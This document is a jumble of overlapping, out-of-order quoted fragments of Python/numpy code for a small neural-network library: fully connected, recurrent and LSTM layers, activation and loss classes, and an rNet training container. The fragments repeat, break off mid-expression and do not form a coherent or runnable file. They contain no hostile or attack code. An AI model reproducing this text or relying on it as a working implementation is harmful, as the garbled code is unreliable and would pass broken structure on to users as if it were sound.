batch,", "0:self.shape[1]] * dCell[t] # activations dAct[t, :, 0:3 * self.shape[1]] *= (1.0 -", "0 if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous", "len(self.layers) def __call__(self, input): ''' input is to be a rank 3 tensor", "and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is", "0 else h0 previous_cell = cells[t - 1] if t > 0 else", "train_on=None): ''' it returns 1, as the derivative is covered by a previous", "* cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act':", "not None: if cache0[l]['c0'] is not None and cache0[l]['h0'] is not None: out,", "t > 0 else h0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]]", "dh = dH[t - 1] if t > 0 else dh0 dh +=", "= cache['c0'] time_steps, batch, out_ = outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape)", "dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH", "= dOut[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients over the", "= cache['cells_act'] cell = cache['cells'] c0 = cache['c0'] time_steps, batch, out_ = outputs.shape", "self.shape[1]]) dH = dOut.copy() if dCache is not None: dH[-1] += np.copy(dH['dHidden']) for", "cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps,", "dH[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients over the entire", "(1.0 - activations[t, :, 0:3 * self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]]", "-1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs,", "Than dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product Now, we have (x_i)", "dCache=None, mask_start=0): inputs = cache['inputs'] outputs = cache['outputs'] activations = cache['activations'] cell_act =", "= self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0'])", "dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class LSTM: ''' Long Short", "0 else c0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input[t]", "np.zeros([time_steps, batch, self.shape[0] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps,", "if t > 0 else h0 inputs[t, :, -1] = 1 inputs[t, :,", "outputs = np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps,", "dY a single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product", "'outputs': outputs} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs']", "dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] * dCell[t] # dwrite_c", "* self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]] dAct[t, :, 3 * self.shape[1]:]", "self.num_of_layers() cache_out = [None] * self.num_of_layers() out = inputs for l in range(0,", "dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class LSTM: '''", "is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None:", "for t in reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) ''' the following", "in reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t] ** 2) * activations[t, :,", "def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch, in_ = input.shape inputs =", "input_2) / 2, axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1 - input_2) /", "# activations dAct[t, :, 0:3 * self.shape[1]] *= (1.0 - activations[t, :, 0:3", "not None: dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct = dH[t]", "self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous = None self.cell = None", "else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class", "dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache is not None: dH[-1]", "'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs']", "= np.zeros([time_steps, batch, out_]) loss=0 for t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t],", "np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]])", "time_steps, batch, out_ = outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput =", "__init__(self, shape, activation=identity()): self.shape = shape self.activation = activation def init(self, scale=1): self.weights", "l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully Connected layer '''", "self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache is not None:", "time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients", "np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init != 0: self.weights[-", "in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) raws", "dot product Now, we have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired", "weights = None activation = None def reset(self): pass def __init__(self, shape, activation=identity()):", "in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()):", "= activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1])", "cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput", "rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T)", "the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return", "dIn = np.zeros([time_steps, batch, out_]) loss=0 for t in reversed(range(0, time_steps)): dIn[t] =", "= cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_ = inputs.shape dIn = np.zeros([time_steps,", "sofmax ''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None):", "its rows and dY holds dY_i as its rows In other words, a", "outputs = cache['outputs'] time_steps, batch, in_ = inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]])", "inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out = [None] *", "def d(self, input): return input * (1 - input) class identity: def __call__(self,", "1], dCell[t - 1]) if t > 0 else (c0, dc0) # dforget", "activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]}", "if dCache is not None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for t", "* self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l],", "np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0 is", "add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None] *", "self.layers: l.init() def reset(self): for l in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_)", "= np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch,", "dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch,", "class LSTM: ''' Long Short Term Memory layer Paper can be found at:", "reset(self): self.previous = None self.cell = None def __call__(self, input_tensor): outputs, cache =", "cell_act[t] * dH[t] C_previous, dC_previous = (cell[t - 1], dCell[t - 1]) if", "def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out", "'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def", "= input.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) outputs =", ":, -1] = 1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] =", "+ self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1,", "outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs} def time_grad(self,", "activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs,", "None self.cell = None def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous)", "1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] = previous raws_ =", "def __call__(self, input): ''' input is to be a rank 3 tensor '''", "= self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape inputs", "self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else:", "= np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn =", "else h0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t,", "input): return 1 / (1 + np.exp(-input)) def d(self, input): return input *", "rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:,", "> 0 else h0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] =", "for t in reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t] ** 2) *", "outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0,", "reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t] ** 2) * activations[t, :, 2", "l in self.layers: out = l(out) return out def init(self): for l in", "inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t in reversed(range(0,", "cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out,", "l.init() def reset(self): for l in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def", "None def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return", "1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for t", "for t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]),", "if t > 0 else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW,", "return loss, dW, cache_out def save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def", "= dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class FCr: ''' Fully Connected recursive", "input is to be a rank 3 tensor ''' out = input for", "mask_start=0): inputs = cache['inputs'] outputs = cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act']", "inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_ = outputs.shape dW =", "- 1]) if t > 0 else (c0, dc0) # dforget dAct[t, :,", "return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape inputs =", "class softmax: ''' Only to be used as the last non-recursive layer '''", "''' dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]]", "np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct =", "a sum of tensor products of columns and rows of the respected matrices", "_ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape", "dY_i as its rows In other words, a product of two matrices is", "combination with sofmax ''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self,", "= self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out def save(self, path): for i,l", "its rows In other words, a product of two matrices is a sum", "activations dAct[t, :, 0:3 * self.shape[1]] *= (1.0 - activations[t, :, 0:3 *", "dW, dIn, {'dHidden': dh0} class LSTM: ''' Long Short Term Memory layer Paper", "cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act'] cell = cache['cells'] c0 = cache['c0']", ":, self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t,", "self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs,", "d(self, input): return input * (1 - input) class identity: def __call__(self, input):", "+= np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) '''", "input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_", "in range(0, self.num_of_layers()): if cache0 is not None and cache0[l] is not None:", "tensor products of columns and rows of the respected matrices ''' dW +=", "None weights = None activation = None def reset(self): pass def __init__(self, shape,", "activations[t, :, 0:3 * self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *= (1.0 -", "cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out = [None] * self.num_of_layers() out =", "Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product dW=x.T*dY where x holds x_i", "dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0", "layers = [] num_of_layers = None def __init__(self): self.num_of_layers = lambda: len(self.layers) def", "* self.shape[1]])) activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t]", "__call__(self, input): shifted_ = input - np.max(input) exp_ = np.exp(shifted_) return exp_ /", "out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor,", "= np.tanh(cells[t]) outputs[t] = activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t]", "self.shape[0] + self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init != 0: self.weights[- 1,", "dCache is not None: dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct", "else c0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t,", "and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t] =", "= outputs[t - 1] if t > 0 else h0 inputs[t, :, -1]", "outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs']", "None activation = None def reset(self): pass def __init__(self, shape, activation=identity()): self.shape =", "words, a product of two matrices is a sum of tensor products of", "def __init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self, input): ''' input is to", "self.num_of_layers() out = inputs for l in range(0, self.num_of_layers()): if cache0 is not", "self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init !=", "in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' %", "h0=self.previous) self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_", "c0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :,", "{'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0':", "* previous_cell + \\ activations[t, :, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:]", "+ self.shape[1]) * scale self.weights[-1, :] = 0 def reset(self): self.previous = None", "axis=0) dW = [None] * self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l], dIn,", "to be used as the last non-recursive layer ''' def __call__(self, input): shifted_", "dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 =", "''' input is to be a rank 3 tensor ''' out = input", "None activation = None def __init__(self, shape, activation=identity()): self.shape = shape self.activation =", "[None] * self.num_of_layers() cache_out = [None] * self.num_of_layers() out = inputs for l", "To be used in combination with sofmax ''' def __call__(self, input, train_on): return", ":, 0:3 * self.shape[1]] *= (1.0 - activations[t, :, 0:3 * self.shape[1]]) *", "as its rows and dY holds dY_i as its rows In other words,", "def __call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def d(self,", "covered by a previous call to softmax_loss function ''' return 1 class softmax_loss:", "= np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH =", "= 1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3 *", "inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0':", "forget bias initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights", "* (1 - input) class identity: def __call__(self, input): return input def d(self,", "1 class mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2) / 2,", "self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :]", "input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return", "len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients", "train_on]) def d(self, probs, train_on=None): ''' it computes the softmax loss derivative for", "self.weights[-1, :] = 0 if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]]", "= cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] * self.num_of_layers()", "returns 1, as the derivative is covered by a previous call to softmax_loss", "for l in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions,", "outputs[t - 1] if t > 0 else h0 inputs[t, :, -1] =", "self.shape[1]) * scale self.weights[-1,] = 0 def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor)", "* self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell + \\", "other words, a product of two matrices is a sum of tensor products", "Let x be a single input and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY", "time_steps, batch, out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn =", "not None and cache0[l] is not None: if cache0[l]['c0'] is not None and", "batch, out_]) loss=0 for t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss", "tmp_ class rNet: layers = [] num_of_layers = None def __init__(self): self.num_of_layers =", "the respected matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] =", "cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs = cache['outputs'] activations = cache['activations'] cell_act", "= None weights = None previous = None cell = None def __init__(self,", "= l(out) return out def init(self): for l in self.layers: l.init() def reset(self):", "= dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if t > 0", "np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t", "derivative for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_", "c0 = np.zeros([batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for", "where x holds x_i as its rows and dY holds dY_i as its", "c0=None, h0=None, mask_start=0): time_steps, batch, in_ = input.shape inputs = np.zeros([time_steps, batch, self.shape[0]", "keepdims=True) def d(self, probs, train_on=None): ''' it returns 1, as the derivative is", "self.weights[-1,] = 0 def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out def", "= outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell =", "np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps,", "= np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,]", "+ \\ activations[t, :, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:] cells_act[t] =", "self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if 'cn'", "exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None): ''' it returns 1,", "input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) raws = np.zeros([time_steps,", "cache0[l]['c0'] is not None and cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out,", "* dCell[t] # dwrite_c dAct[t, :, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]]", "be a rank 3 tensor ''' out = input for l in self.layers:", "tanh: def __call__(self, input): return np.tanh(input) def d(self, input): return 1 - input", "l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss,", "axis=1, keepdims=True) def d(self, probs, train_on=None): ''' it returns 1, as the derivative", "outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return", "0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :,", "self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale", "not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else:", "previous = outputs[t - 1] if t > 0 else h0 previous_cell =", "''' forget bias initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 '''", "self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1])", "batch, out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps,", "self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) /", "t in range(0, time_steps): previous = outputs[t - 1] if t > 0", "the matrix product dW=x.T*dY where x holds x_i as its rows and dY", "cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self,", "!= 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous = None self.cell", "self.shape[1]] = forget_bias_init self.previous = None self.cell = None def reset(self): self.previous =", "'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad,", "*= (1.0 - activations[t, :, 3 * self.shape[1]:] ** 2) ''' the following", "0:self.shape[0]] dh = dH[t - 1] if t > 0 else dh0 dh", "self.cell = None def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell", "''' Fully Connected recursive layer ''' shape = None weights = None previous", "as the derivative is covered by a previous call to softmax_loss function '''", "http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights = None previous = None cell =", "if t > 0 else h0 previous_cell = cells[t - 1] if t", "* input class sigmoid: def __call__(self, input): return 1 / (1 + np.exp(-input))", "range(0, self.num_of_layers()): if cache0 is not None and cache0[l] is not None: if", "self.shape[1]] = C_previous * dCell[t] dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] *", "is not None and cache0[l] is not None: if cache0[l]['c0'] is not None", "dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out def save(self, path):", "None: if cache0[l]['c0'] is not None and cache0[l]['h0'] is not None: out, cache[l]", "outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0': h0,", "self.previous = None self.cell = None def reset(self): self.previous = None self.cell =", "= self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0': h0, 'hn':", "time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] +", "activations[t, :, 3 * self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :, 3 *", "out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch,", "np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,] = 0 def __call__(self, input_tensor): out,", "+= dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t] **", "init(self, forget_bias_init=3): ''' forget bias initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section", "batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations", "init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0]", "class identity: def __call__(self, input): return input def d(self, input): return 1 class", "time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW = [None]", "sums the gradients over the entire batch proof: Let x be a single", "weights = None previous = None activation = None def __init__(self, shape, activation=identity()):", "bias initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights =", "np.zeros([time_steps, batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t", "def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation def init(self, scale=1):", "dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_ =", "class softmax_loss: ''' To be used in combination with sofmax ''' def __call__(self,", "class sigmoid: def __call__(self, input): return 1 / (1 + np.exp(-input)) def d(self,", "inputs for l in range(0, self.num_of_layers()): if cache0 is not None and cache0[l]", ":, self.shape[1]:2 * self.shape[1]] * previous_cell + \\ activations[t, :, 0:self.shape[1]] * activations[t,", "np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] * self.num_of_layers() for l in reversed(range(0, self.num_of_layers())):", "self.shape[1]:3 * self.shape[1]] * dH[t] # dout dAct[t, :, 2 * self.shape[1]:3 *", "train_on=None): ''' it computes the softmax loss derivative for optimality ''' tmp_ =", "np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell", "self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for t in range(0, time_steps): inputs[t, :,", "def d(self, probs, train_on=None): ''' it returns 1, as the derivative is covered", "__call__(self, input): return np.tanh(input) def d(self, input): return 1 - input * input", "'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs", "batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if h0 is None: h0 =", "0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t,", "the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] =", "self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :, 3 * self.shape[1]:] = activations[t, :,", "dAct[t, :, 3 * self.shape[1]:] *= (1.0 - activations[t, :, 3 * self.shape[1]:]", "matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn,", "self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self,", "1 return tmp_ class rNet: layers = [] num_of_layers = None def __init__(self):", "dc0) # dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t] dC_previous", "input): return np.tanh(input) def d(self, input): return 1 - input * input class", "reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out", "0:3 * self.shape[1]])) activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:])", "dCell[t] += (1 - cell_act[t] ** 2) * activations[t, :, 2 * self.shape[1]:3", "= np.zeros([batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t", "= input - np.max(input) exp_ = np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True)", "and cache0[l] is not None: if 